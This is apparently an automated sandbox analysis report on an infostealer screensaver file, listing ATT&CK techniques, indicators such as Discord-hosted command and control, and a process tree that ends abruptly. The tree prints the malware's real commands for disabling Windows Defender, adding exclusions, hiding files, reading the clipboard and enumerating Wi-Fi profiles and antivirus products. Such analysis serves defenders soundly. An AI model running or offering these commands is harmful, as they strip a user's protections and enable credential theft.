1faab4afb06b4c64fe101c192a011c6b46f6512508e731297b1cfa61d00be062

Resubmissions

21-12-2024 23:00

241221-2zb9qatjhm 10

21-12-2024 22:54

241221-2vvv9sspbs 10

21-12-2024 21:16

241221-z4wstazmf1 10

Analysis

max time kernel
300s
max time network
305s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21-12-2024 23:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

‏ ‎ .scr
Size

8.4MB
MD5

4c2e99ad9f41635ec0a4d55ba7a813df
SHA1

3087a6ddc6819bbc807e2fb08e38cac575a0ab5f
SHA256

1faab4afb06b4c64fe101c192a011c6b46f6512508e731297b1cfa61d00be062
SHA512

d5ba473a117d5cda57ac443af9b5974723352a73bad248c6403751b8bf81e232f25dcd69371d4b210e41561e52ffc61bbb813c2d8709843236ffb2f434de1f5e
SSDEEP

196608:Wc0gf6uZjk99NgeNTfm/pf+xk4dWRpmrbW3jmr4:Df6NPy/pWu4kRpmrbmyr4

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3188	powershell.exe
1116	powershell.exe
3524	powershell.exe
3560	powershell.exe
2028	powershell.exe
1944	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	‏ ‎ .scr
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4680	cmd.exe
980	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
2804	bound.exe
2684	rar.exe
1588	bound.exe
2276	bound.exe
4416	bound.exe

Loads dropped DLL 18 IoCs

pid	Process
3368	‏ ‎ .scr
3368	‏ ‎ .scr
3368	‏ ‎ .scr
3368	‏ ‎ .scr
3368	‏ ‎ .scr
3368	‏ ‎ .scr
3368	‏ ‎ .scr
3368	‏ ‎ .scr
3368	‏ ‎ .scr
3368	‏ ‎ .scr
3368	‏ ‎ .scr
3368	‏ ‎ .scr
3368	‏ ‎ .scr
3368	‏ ‎ .scr
3368	‏ ‎ .scr
3368	‏ ‎ .scr
3368	‏ ‎ .scr
2804	bound.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
30	discord.com
32	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
25	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4336	tasklist.exe
3460	tasklist.exe
2840	tasklist.exe
1056	tasklist.exe
452	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4536	cmd.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a000000023b78-22.dat	upx
behavioral1/memory/3368-26-0x00007FFE033B0000-0x00007FFE03998000-memory.dmp	upx
behavioral1/files/0x000a000000023b76-31.dat	upx
behavioral1/files/0x000a000000023b71-50.dat	upx
behavioral1/files/0x000a000000023b70-49.dat	upx
behavioral1/files/0x000a000000023b6f-48.dat	upx
behavioral1/files/0x000a000000023b6e-47.dat	upx
behavioral1/files/0x000a000000023b6d-46.dat	upx
behavioral1/files/0x000a000000023b6c-45.dat	upx
behavioral1/files/0x000a000000023b6b-44.dat	upx
behavioral1/files/0x000a000000023b69-43.dat	upx
behavioral1/files/0x000a000000023b7d-42.dat	upx
behavioral1/files/0x000a000000023b7c-41.dat	upx
behavioral1/files/0x000a000000023b7b-40.dat	upx
behavioral1/files/0x000a000000023b77-37.dat	upx
behavioral1/files/0x000a000000023b75-36.dat	upx
behavioral1/memory/3368-33-0x00007FFE1B5F0000-0x00007FFE1B5FF000-memory.dmp	upx
behavioral1/memory/3368-32-0x00007FFE17560000-0x00007FFE17584000-memory.dmp	upx
behavioral1/files/0x000a000000023b6a-29.dat	upx
behavioral1/memory/3368-56-0x00007FFE12660000-0x00007FFE1268D000-memory.dmp	upx
behavioral1/memory/3368-61-0x00007FFE123D0000-0x00007FFE123F3000-memory.dmp	upx
behavioral1/memory/3368-62-0x00007FFE03040000-0x00007FFE031B3000-memory.dmp	upx
behavioral1/memory/3368-60-0x00007FFE12400000-0x00007FFE12419000-memory.dmp	upx
behavioral1/memory/3368-66-0x00007FFE16580000-0x00007FFE1658D000-memory.dmp	upx
behavioral1/memory/3368-64-0x00007FFE11F90000-0x00007FFE11FA9000-memory.dmp	upx
behavioral1/memory/3368-68-0x00007FFE129F0000-0x00007FFE12A1E000-memory.dmp	upx
behavioral1/memory/3368-70-0x00007FFE032F0000-0x00007FFE033A8000-memory.dmp	upx
behavioral1/memory/3368-73-0x00007FFE033B0000-0x00007FFE03998000-memory.dmp	upx
behavioral1/memory/3368-76-0x00007FFE17560000-0x00007FFE17584000-memory.dmp	upx
behavioral1/memory/3368-78-0x00007FFE18860000-0x00007FFE18874000-memory.dmp	upx
behavioral1/memory/3368-74-0x00007FFE027D0000-0x00007FFE02B45000-memory.dmp	upx
behavioral1/memory/3368-85-0x00007FFE031D0000-0x00007FFE032EC000-memory.dmp	upx
behavioral1/memory/3368-84-0x00007FFE03040000-0x00007FFE031B3000-memory.dmp	upx
behavioral1/memory/3368-83-0x00007FFE123D0000-0x00007FFE123F3000-memory.dmp	upx
behavioral1/memory/3368-80-0x00007FFE129E0000-0x00007FFE129ED000-memory.dmp	upx
behavioral1/memory/3368-87-0x00007FFE11F90000-0x00007FFE11FA9000-memory.dmp	upx
behavioral1/memory/3368-130-0x00007FFE129F0000-0x00007FFE12A1E000-memory.dmp	upx
behavioral1/memory/3368-131-0x00007FFE032F0000-0x00007FFE033A8000-memory.dmp	upx
behavioral1/memory/3368-132-0x00007FFE027D0000-0x00007FFE02B45000-memory.dmp	upx
behavioral1/memory/3368-290-0x00007FFE027D0000-0x00007FFE02B45000-memory.dmp	upx
behavioral1/memory/3368-279-0x00007FFE033B0000-0x00007FFE03998000-memory.dmp	upx
behavioral1/memory/3368-289-0x00007FFE032F0000-0x00007FFE033A8000-memory.dmp	upx
behavioral1/memory/3368-288-0x00007FFE129F0000-0x00007FFE12A1E000-memory.dmp	upx
behavioral1/memory/3368-285-0x00007FFE03040000-0x00007FFE031B3000-memory.dmp	upx
behavioral1/memory/3368-280-0x00007FFE17560000-0x00007FFE17584000-memory.dmp	upx
behavioral1/memory/3368-336-0x00007FFE033B0000-0x00007FFE03998000-memory.dmp	upx
behavioral1/memory/3368-424-0x00007FFE031D0000-0x00007FFE032EC000-memory.dmp	upx
behavioral1/memory/3368-423-0x00007FFE129E0000-0x00007FFE129ED000-memory.dmp	upx
behavioral1/memory/3368-422-0x00007FFE18860000-0x00007FFE18874000-memory.dmp	upx
behavioral1/memory/3368-425-0x00007FFE027D0000-0x00007FFE02B45000-memory.dmp	upx
behavioral1/memory/3368-421-0x00007FFE032F0000-0x00007FFE033A8000-memory.dmp	upx
behavioral1/memory/3368-420-0x00007FFE129F0000-0x00007FFE12A1E000-memory.dmp	upx
behavioral1/memory/3368-419-0x00007FFE16580000-0x00007FFE1658D000-memory.dmp	upx
behavioral1/memory/3368-418-0x00007FFE11F90000-0x00007FFE11FA9000-memory.dmp	upx
behavioral1/memory/3368-417-0x00007FFE03040000-0x00007FFE031B3000-memory.dmp	upx
behavioral1/memory/3368-416-0x00007FFE123D0000-0x00007FFE123F3000-memory.dmp	upx
behavioral1/memory/3368-415-0x00007FFE12400000-0x00007FFE12419000-memory.dmp	upx
behavioral1/memory/3368-414-0x00007FFE12660000-0x00007FFE1268D000-memory.dmp	upx
behavioral1/memory/3368-413-0x00007FFE1B5F0000-0x00007FFE1B5FF000-memory.dmp	upx
behavioral1/memory/3368-412-0x00007FFE17560000-0x00007FFE17584000-memory.dmp	upx
behavioral1/memory/3368-411-0x00007FFE033B0000-0x00007FFE03998000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1648	cmd.exe
4364	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3860	cmd.exe
4872	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4364	WMIC.exe
1448	WMIC.exe
4880	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3556	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133792957388593679"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Opens file in notepad (likely ransom note) 4 IoCs

ransomware

pid	Process
4392	NOTEPAD.EXE
4268	NOTEPAD.EXE
4252	NOTEPAD.EXE
5020	NOTEPAD.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4364	PING.EXE

Suspicious behavior: EnumeratesProcesses 31 IoCs

pid	Process
3524	powershell.exe
3524	powershell.exe
3188	powershell.exe
3188	powershell.exe
3560	powershell.exe
3560	powershell.exe
3560	powershell.exe
3188	powershell.exe
1116	powershell.exe
1116	powershell.exe
980	powershell.exe
980	powershell.exe
3168	powershell.exe
3168	powershell.exe
980	powershell.exe
3168	powershell.exe
2028	powershell.exe
2028	powershell.exe
4188	powershell.exe
4188	powershell.exe
1944	powershell.exe
1944	powershell.exe
4820	powershell.exe
4820	powershell.exe
4820	powershell.exe
1164	chrome.exe
1164	chrome.exe
2432	chrome.exe
2432	chrome.exe
2432	chrome.exe
2432	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs

pid	Process
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3524	powershell.exe
Token: SeIncreaseQuotaPrivilege	4188	WMIC.exe
Token: SeSecurityPrivilege	4188	WMIC.exe
Token: SeTakeOwnershipPrivilege	4188	WMIC.exe
Token: SeLoadDriverPrivilege	4188	WMIC.exe
Token: SeSystemProfilePrivilege	4188	WMIC.exe
Token: SeSystemtimePrivilege	4188	WMIC.exe
Token: SeProfSingleProcessPrivilege	4188	WMIC.exe
Token: SeIncBasePriorityPrivilege	4188	WMIC.exe
Token: SeCreatePagefilePrivilege	4188	WMIC.exe
Token: SeBackupPrivilege	4188	WMIC.exe
Token: SeRestorePrivilege	4188	WMIC.exe
Token: SeShutdownPrivilege	4188	WMIC.exe
Token: SeDebugPrivilege	4188	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4188	WMIC.exe
Token: SeRemoteShutdownPrivilege	4188	WMIC.exe
Token: SeUndockPrivilege	4188	WMIC.exe
Token: SeManageVolumePrivilege	4188	WMIC.exe
Token: 33	4188	WMIC.exe
Token: 34	4188	WMIC.exe
Token: 35	4188	WMIC.exe
Token: 36	4188	WMIC.exe
Token: SeDebugPrivilege	4336	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4188	WMIC.exe
Token: SeSecurityPrivilege	4188	WMIC.exe
Token: SeTakeOwnershipPrivilege	4188	WMIC.exe
Token: SeLoadDriverPrivilege	4188	WMIC.exe
Token: SeSystemProfilePrivilege	4188	WMIC.exe
Token: SeSystemtimePrivilege	4188	WMIC.exe
Token: SeProfSingleProcessPrivilege	4188	WMIC.exe
Token: SeIncBasePriorityPrivilege	4188	WMIC.exe
Token: SeCreatePagefilePrivilege	4188	WMIC.exe
Token: SeBackupPrivilege	4188	WMIC.exe
Token: SeRestorePrivilege	4188	WMIC.exe
Token: SeShutdownPrivilege	4188	WMIC.exe
Token: SeDebugPrivilege	4188	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4188	WMIC.exe
Token: SeRemoteShutdownPrivilege	4188	WMIC.exe
Token: SeUndockPrivilege	4188	WMIC.exe
Token: SeManageVolumePrivilege	4188	WMIC.exe
Token: 33	4188	WMIC.exe
Token: 34	4188	WMIC.exe
Token: 35	4188	WMIC.exe
Token: 36	4188	WMIC.exe
Token: SeDebugPrivilege	3560	powershell.exe
Token: SeDebugPrivilege	3188	powershell.exe
Token: SeIncreaseQuotaPrivilege	4364	WMIC.exe
Token: SeSecurityPrivilege	4364	WMIC.exe
Token: SeTakeOwnershipPrivilege	4364	WMIC.exe
Token: SeLoadDriverPrivilege	4364	WMIC.exe
Token: SeSystemProfilePrivilege	4364	WMIC.exe
Token: SeSystemtimePrivilege	4364	WMIC.exe
Token: SeProfSingleProcessPrivilege	4364	WMIC.exe
Token: SeIncBasePriorityPrivilege	4364	WMIC.exe
Token: SeCreatePagefilePrivilege	4364	WMIC.exe
Token: SeBackupPrivilege	4364	WMIC.exe
Token: SeRestorePrivilege	4364	WMIC.exe
Token: SeShutdownPrivilege	4364	WMIC.exe
Token: SeDebugPrivilege	4364	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4364	WMIC.exe
Token: SeRemoteShutdownPrivilege	4364	WMIC.exe
Token: SeUndockPrivilege	4364	WMIC.exe
Token: SeManageVolumePrivilege	4364	WMIC.exe
Token: 33	4364	WMIC.exe

Suspicious use of FindShellTrayWindow 29 IoCs

pid	Process
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
5020	NOTEPAD.EXE

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe
1164	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3568 wrote to memory of 3368	3568	‏ ‎ .scr	83
PID 3568 wrote to memory of 3368	3568	‏ ‎ .scr	83
PID 3368 wrote to memory of 2072	3368	‏ ‎ .scr	85
PID 3368 wrote to memory of 2072	3368	‏ ‎ .scr	85
PID 3368 wrote to memory of 2228	3368	‏ ‎ .scr	86
PID 3368 wrote to memory of 2228	3368	‏ ‎ .scr	86
PID 3368 wrote to memory of 4436	3368	‏ ‎ .scr	87
PID 3368 wrote to memory of 4436	3368	‏ ‎ .scr	87
PID 3368 wrote to memory of 1576	3368	‏ ‎ .scr	88
PID 3368 wrote to memory of 1576	3368	‏ ‎ .scr	88
PID 3368 wrote to memory of 2460	3368	‏ ‎ .scr	93
PID 3368 wrote to memory of 2460	3368	‏ ‎ .scr	93
PID 3368 wrote to memory of 2860	3368	‏ ‎ .scr	95
PID 3368 wrote to memory of 2860	3368	‏ ‎ .scr	95
PID 4436 wrote to memory of 3524	4436	cmd.exe	97
PID 4436 wrote to memory of 3524	4436	cmd.exe	97
PID 2460 wrote to memory of 4336	2460	cmd.exe	98
PID 2460 wrote to memory of 4336	2460	cmd.exe	98
PID 2860 wrote to memory of 4188	2860	cmd.exe	99
PID 2860 wrote to memory of 4188	2860	cmd.exe	99
PID 1576 wrote to memory of 2804	1576	cmd.exe	100
PID 1576 wrote to memory of 2804	1576	cmd.exe	100
PID 2072 wrote to memory of 3188	2072	cmd.exe	102
PID 2072 wrote to memory of 3188	2072	cmd.exe	102
PID 2228 wrote to memory of 3560	2228	cmd.exe	103
PID 2228 wrote to memory of 3560	2228	cmd.exe	103
PID 3368 wrote to memory of 3624	3368	‏ ‎ .scr	150
PID 3368 wrote to memory of 3624	3368	‏ ‎ .scr	150
PID 3624 wrote to memory of 2856	3624	cmd.exe	107
PID 3624 wrote to memory of 2856	3624	cmd.exe	107
PID 3368 wrote to memory of 3168	3368	‏ ‎ .scr	153
PID 3368 wrote to memory of 3168	3368	‏ ‎ .scr	153
PID 3168 wrote to memory of 3064	3168	cmd.exe	110
PID 3168 wrote to memory of 3064	3168	cmd.exe	110
PID 3368 wrote to memory of 2024	3368	‏ ‎ .scr	181
PID 3368 wrote to memory of 2024	3368	‏ ‎ .scr	181
PID 2024 wrote to memory of 4364	2024	cmd.exe	113
PID 2024 wrote to memory of 4364	2024	cmd.exe	113
PID 3368 wrote to memory of 3916	3368	‏ ‎ .scr	114
PID 3368 wrote to memory of 3916	3368	‏ ‎ .scr	114
PID 3916 wrote to memory of 1448	3916	cmd.exe	116
PID 3916 wrote to memory of 1448	3916	cmd.exe	116
PID 3368 wrote to memory of 4536	3368	‏ ‎ .scr	160
PID 3368 wrote to memory of 4536	3368	‏ ‎ .scr	160
PID 3368 wrote to memory of 4812	3368	‏ ‎ .scr	119
PID 3368 wrote to memory of 4812	3368	‏ ‎ .scr	119
PID 4812 wrote to memory of 1116	4812	cmd.exe	121
PID 4812 wrote to memory of 1116	4812	cmd.exe	121
PID 4536 wrote to memory of 4620	4536	cmd.exe	122
PID 4536 wrote to memory of 4620	4536	cmd.exe	122
PID 3368 wrote to memory of 3432	3368	‏ ‎ .scr	123
PID 3368 wrote to memory of 3432	3368	‏ ‎ .scr	123
PID 3368 wrote to memory of 3024	3368	‏ ‎ .scr	124
PID 3368 wrote to memory of 3024	3368	‏ ‎ .scr	124
PID 3368 wrote to memory of 3932	3368	‏ ‎ .scr	127
PID 3368 wrote to memory of 3932	3368	‏ ‎ .scr	127
PID 3368 wrote to memory of 4680	3368	‏ ‎ .scr	128
PID 3368 wrote to memory of 4680	3368	‏ ‎ .scr	128
PID 3024 wrote to memory of 3460	3024	cmd.exe	131
PID 3024 wrote to memory of 3460	3024	cmd.exe	131
PID 3432 wrote to memory of 2840	3432	cmd.exe	132
PID 3432 wrote to memory of 2840	3432	cmd.exe	132
PID 3932 wrote to memory of 2976	3932	cmd.exe	133
PID 3932 wrote to memory of 2976	3932	cmd.exe	133

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4620	attrib.exe
4536	attrib.exe
2440	attrib.exe

C:\Users\Admin\AppData\Local\Temp\‏ ‎ .scr
"C:\Users\Admin\AppData\Local\Temp\‏ ‎ .scr" /S
1⤵
- Suspicious use of WriteProcessMemory
PID:3568
- C:\Users\Admin\AppData\Local\Temp\‏ ‎ .scr
  "C:\Users\Admin\AppData\Local\Temp\‏ ‎ .scr" /S
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\‏ ‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\‏ ‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2228
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1576
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2460
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2860
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3624
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3168
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2024
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\‏ ‎ .scr""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4536
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\‏ ‎ .scr"
      4⤵
      Views/modifies file attributes
      PID:4620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4812
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3432
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3024
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3932
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2056
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5100
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
